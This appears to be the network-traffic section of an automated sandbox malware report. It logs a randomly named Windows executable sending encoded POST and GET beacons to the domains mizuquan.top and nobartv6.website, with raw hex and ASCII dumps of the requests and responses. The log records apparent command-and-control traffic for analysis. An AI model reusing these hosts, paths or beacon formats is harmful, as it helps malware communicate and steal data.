                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                              Oct 8, 2024 15:55:29.918478966 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:29 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              31 | 192.168.2.6 | 50023 | 43.242.202.169 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Oct 8, 2024 15:55:31.075041056 CEST | 1854 | OUT | POST /e0nr/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Origin: http://www.mizuquan.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.mizuquan.top/e0nr/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 64 51 73 72 32 74 69 31 39 61 54 49 51 6a 56 48 55 33 30 36 6c 76 4e 2f 4e 69 7a 62 46 4d 41 32 33 57 30 4d 6e 46 73 65 4c 4d 63 41 65 51 32 4d 31 74 46 6b 78 58 64 4f 66 57 74 71 78 5a 66 75 70 57 30 42 64 67 42 64 56 6b 56 67 62 38 54 30 56 36 36 69 45 62 50 45 4f 75 65 57 6d 54 55 2f 69 44 6e 2b 74 35 34 58 4c 35 4b 4d 52 73 70 67 61 42 44 76 4c 48 46 6d 59 37 35 41 2f 32 46 58 50 50 65 65 6d 62 73 4f 47 41 59 50 6a 71 44 35 2b 43 63 44 47 63 6b 79 4d 71 6c 54 52 5a 65 6e 33 2b [TRUNCATED]
                                                                                              Data Ascii: I4ET5=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdVdQsr2ti19aTIQjVHU306lvN/NizbFMA23W0MnFseLMcAeQ2M1tFkxXdOfWtqxZfupW0BdgBdVkVgb8T0V66iEbPEOueWmTU/iDn+t54XL5KMRspgaBDvLHFmY75A/2FXPPeembsOGAYPjqD5+CcDGckyMqlTRZen3+0dd2CXq/d7qJJ8XZcxcgKD5HBBIj/YM7EVbLECAPIzEzy8yQM+05SH29l+zQ4DEUa447QvpMzv9FohaGh5sfFs27UWmsuDk9ZDlHsKdneXN5jSE+xQfW3jtDhktcQaHo0MLaWwcFcQywzn34v7oLOW4vLbLwlcQrwBswQOF2aOhWpLtE4Af2belsJ4PsEi5mUsk8tt7CstYOjJtvfrAvDAD/0N5LY1BNXx6+ojhVPEFhApGs/WT+UfUudssxkifjAitg9u15xK8TpaLm1CXh8lJKduxjWYRzRDUUsenKJd1/vM72USBCtr4iFOtl3tT4/ZVWnDj+INjwXVHtrSz9py3lSOJJhtfUmGv5aSXCKhBYJewgiv6k2KVxKg/TraG5pCDbeqyyp0HB++dOlbUzn17msoDQ66CEz+Iwqr1uHGzx1BquprrVB4PU0VrVTDeP19+ijIhXl/WvFi7EReeWNea+ALdakWr4d0Y3gG220QEsfs7Ar1MdwP9vBQZudfTCXxYWPCWLoleF3qw4RjiGW0/Z0bgnnsF03ZmQeu0KXPZAO7TuotRz4aUgG51SyT2aKmTXhO38X8wt6L1gsyyi4bF5iT7PRYLALrPj6YaiQHLESCnIK7i/JujrIT3pZ/XEF927iFn/YFwlWMPE6Er/sbER+fFwLst8Na [TRUNCATED]
                                                                                              Oct 8, 2024 15:55:32.142285109 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:31 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              32 | 192.168.2.6 | 50024 | 43.242.202.169 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Oct 8, 2024 15:55:33.618738890 CEST | 565 | OUT | GET /e0nr/?I4ET5=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txL1JCWIKw0rFG3lN0WjCCPv2jnxqsoqX4CWEeQPgrQsdkl4cxLCA=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.mizuquan.top
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:55:34.513824940 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:34 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              33 | 192.168.2.6 | 50025 | 103.224.182.242 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Oct 8, 2024 15:55:39.966044903 CEST | 829 | OUT | POST /pp43/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Origin: http://www.nobartv6.website
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.nobartv6.website/pp43/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 57 79 55 2f 72 32 54 6e 52 34 4f 43 34 6f 44 57 2f 38 6b 68 4b 35 71 71 76 73 35 67 41 52 5a 47 76 47 33 5a 72 2f 38 69 75 52 54 43 69 35 58 4d 33 68 72 50 78 6c 30 72 70 63 57 4e 41 47 6a 49 66 43 74 46 75 33 45 6d 37 65 78 4c 6b 68 70 4b 33 32 51 63 45 43 70 63 44 7a 69 31 6c 2f 6a 68 51 58 6b 38 45 46 6b 5a 51 6c 66 66 46 4c 77 4a 4f 71 4c 49 44 56 2f 56 71 64 77 70 39 53 6f 68 75 65 46 56 7a 42 4f 47 78 6e 79 54 51 7a 30 51 49 52 77 73 44 44 34 49 71 45 69 57 57 62 2b 45 44 71 7a 73 58 6a 44 4e 59 37 77 75 4b 49 78 35 52 4f 39 53 6d 56 42 57 73 39 74 52 31 2b 48
                                                                                              Data Ascii: I4ET5=ywbiYQ/q4W1CmWyU/r2TnR4OC4oDW/8khK5qqvs5gARZGvG3Zr/8iuRTCi5XM3hrPxl0rpcWNAGjIfCtFu3Em7exLkhpK32QcECpcDzi1l/jhQXk8EFkZQlffFLwJOqLIDV/Vqdwp9SohueFVzBOGxnyTQz0QIRwsDD4IqEiWWb+EDqzsXjDNY7wuKIx5RO9SmVBWs9tR1+H
                                                                                              Oct 8, 2024 15:55:40.590358019 CEST | 876 | IN | HTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:40 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395740.6411101; expires=Fri, 06-Oct-2034 13:55:40 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              content-length: 581
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                                                              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                              34 | 192.168.2.6 | 50026 | 103.224.182.242 | 80
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Oct 8, 2024 15:55:43.696643114 CEST | 853 | OUT | POST /pp43/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Origin: http://www.nobartv6.website
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.nobartv6.website/pp43/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 6c 5a 66 4e 65 33 4c 5a 48 38 6c 75 52 54 4a 43 35 53 43 58 67 47 50 32 74 38 72 6f 77 57 4e 41 36 6a 49 65 79 74 46 64 66 4c 33 37 65 7a 43 45 68 6e 46 58 32 51 63 45 43 70 63 43 58 4d 31 6a 58 6a 67 6c 66 6b 2b 6c 46 72 52 77 6c 59 50 31 4c 77 4e 4f 71 50 49 44 56 4a 56 72 42 65 70 34 65 6f 68 73 47 46 57 69 42 4a 64 68 6e 34 64 77 7a 69 5a 35 34 72 72 7a 4f 45 50 71 4d 50 4b 31 72 4f 42 31 72 70 77 6b 6a 67 66 49 62 79 75 49 51 44 35 78 4f 58 51 6d 74 42 45 37 78 4b 65 42 62 6b 35 4c 63 58 66 51 4b 36 32 4d 59 2f 63 6e 42 69 34 45 35 75 4f 51 3d 3d
                                                                                              Data Ascii: I4ET5=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThylZfNe3LZH8luRTJC5SCXgGP2t8rowWNA6jIeytFdfL37ezCEhnFX2QcECpcCXM1jXjglfk+lFrRwlYP1LwNOqPIDVJVrBep4eohsGFWiBJdhn4dwziZ54rrzOEPqMPK1rOB1rpwkjgfIbyuIQD5xOXQmtBE7xKeBbk5LcXfQK62MY/cnBi4E5uOQ==
                                                                                              Oct 8, 2024 15:55:44.298182011 CEST | 876 | IN | HTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:44 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395744.6678593; expires=Fri, 06-Oct-2034 13:55:44 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              content-length: 581
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                                                              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                              35 | 192.168.2.6 | 50027 | 103.224.182.242 | 80
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Oct 8, 2024 15:55:46.245667934 CEST | 1866 | OUT | POST /pp43/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Origin: http://www.nobartv6.website
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.nobartv6.website/pp43/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 33 4f 43 69 65 4f 74 6c 44 50 44 49 33 70 2f 6f 64 69 77 47 36 7a 49 51 70 4d 43 4b 46 69 63 46 4c 79 38 66 77 49 55 42 4c 35 32 64 49 44 63 51 4e 79 73 47 73 58 59 58 4d 50 4b 2b 66 34 35 49 4a 34 73 4d 36 35 59 66 47 4e 33 56 4c 4f 49 53 33 65 50 56 53 74 7a 32 4a 68 78 61 31 44 7a 31 4b 69 5a 44 6c 6c 43 4f 37 62 77 4a 52 58 55 62 55 32 75 62 79 36 69 37 4d 49 38 46 78 4d 64 4a 52 61 6e 66 4d 48 4a 64 30 31 52 63 38 48 2f 30 69 50 77 65 6d 67 78 57 74 2b 73 35 59 37 54 5a 47 74 [TRUNCATED]
                                                                                              Data Ascii: I4ET5=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 [TRUNCATED]
                                                                                              Oct 8, 2024 15:55:46.851593971 CEST | 876 | IN | HTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:46 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395746.2134099; expires=Fri, 06-Oct-2034 13:55:46 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              content-length: 581
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                                                              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                              36 | 192.168.2.6 | 50028 | 103.224.182.242 | 80
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Oct 8, 2024 15:55:48.788316965 CEST | 569 | OUT | GET /pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkSAI62mQlNqC9c=&5xn03=7vMx2HlPWl HTTP/1.1
